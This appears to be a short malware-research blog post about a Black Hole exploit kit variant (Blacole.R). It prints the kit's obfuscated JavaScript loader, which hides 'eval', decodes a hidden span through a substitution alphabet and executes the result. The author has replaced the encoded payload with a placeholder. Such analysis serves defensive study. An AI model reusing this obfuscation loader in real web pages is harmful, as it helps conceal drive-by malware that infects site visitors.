Interesting malicious script #3

This is the newest variant of black hole, labeled by MS as Blacole.R. It is still surprising to see the signature of Black hole upgraded nearly a dozen of version in a month or two.

 

I've replaced the payload in <span></span> as it is very large.

 

Eval itself is turned into string and I think they can even play more tricks to hide the string eval.

 

<html><title>ev</title><body><input type="input" name="KVhMSfMk" value="length" style="display:none"><span style="visibility:hidden">
<span>"Large Malicious Payload"</span></span><script>
riJdw0= this["document"];
Wm6aTby4="innerHTML";
Jws9z=window;
riJdw0.tAinU7TY= function(hy){ return riJdw0.getElementsByName(hy);};
riJdw0.PgOrtKo= function(hy){ return riJdw0.getElementsByTagName(hy);};

MCchJo=riJdw0.tAinU7TY("KVhMSfMk")[0]["va"+"lue"];

vjhac2P= new Function("x,y,z","return x.replace(y,z)");
BMEIlPB= new Function("x,y,z","return x.substr(y,z)");


M21Sq=vjhac2P("","", new Object("eval"));

jKSwJN = Jws9z[M21Sq](M21Sq);

dqCjX=riJdw0.PgOrtKo("span")[1][Wm6aTby4];
SloAR = "pN#QWy,^Kri['HEBe=k ctAbZsO4Dg&X@US9VzT7Rq/>fwI*$Jn6_vxC;\\L5Y+d(:1].aoh<l-8!P23?0)GjMm\"|uF{%}";
PCvwO="";
NxJdPAs=dqCjX[MCchJo];
Po7tS43=0;
while(Po7tS43<NxJdPAs){
Ub4phW=BMEIlPB(dqCjX,Po7tS43+(124*0),44/22)*(45*2/90);
PCvwO=PCvwO["concat"](BMEIlPB(SloAR,jKSwJN("Ub4phW"),1));
Po7tS43=2+Po7tS43;
}
jKSwJN(PCvwO);

</script></body></html>